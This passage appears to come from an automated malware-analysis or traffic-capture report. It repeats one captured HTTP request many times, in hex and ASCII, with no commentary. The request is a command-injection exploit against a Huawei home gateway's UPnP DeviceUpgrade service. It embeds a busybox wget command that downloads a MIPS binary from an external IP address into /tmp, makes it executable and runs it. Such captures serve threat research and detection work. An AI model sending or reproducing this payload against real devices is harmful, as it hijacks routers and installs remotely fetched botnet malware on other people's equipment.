2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 